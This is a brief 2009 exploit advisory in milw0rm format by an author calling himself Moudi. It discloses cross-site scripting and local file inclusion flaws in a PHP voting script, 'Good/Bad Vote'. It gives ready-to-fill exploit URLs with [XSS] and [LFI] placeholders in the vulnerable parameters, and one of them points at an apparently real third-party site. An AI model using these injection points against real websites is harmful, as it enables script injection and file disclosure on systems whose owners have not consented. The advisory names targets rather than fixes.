########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [»] Good/Bad Vote (XSS/LFI) Vulnerability ============================================================================== [»] Script: [ Good/Bad Vote ] [»] Language: [ PHP ] [»] Download: [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1086552418 ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] [»] Team: [ EvilWay ] [»] Dork: [ OFF ] [»] Price: [ 6 US $ ] ########################################################################### ===[ Exploit XSS vulnerability ]=== [»] http://www.site.com/patch/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt [»] http://searchall.iwebland.com:80/sigs/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt XSS TO ADD: 1 ===[ Exploit LFI ]=== [»] http://www.site.com/patch/vote.php?action=dovote&id=[LFI]&ficdest=.dat&midcast=.txt Author: Moudi ########################################################################### # milw0rm.com [2009-07-17]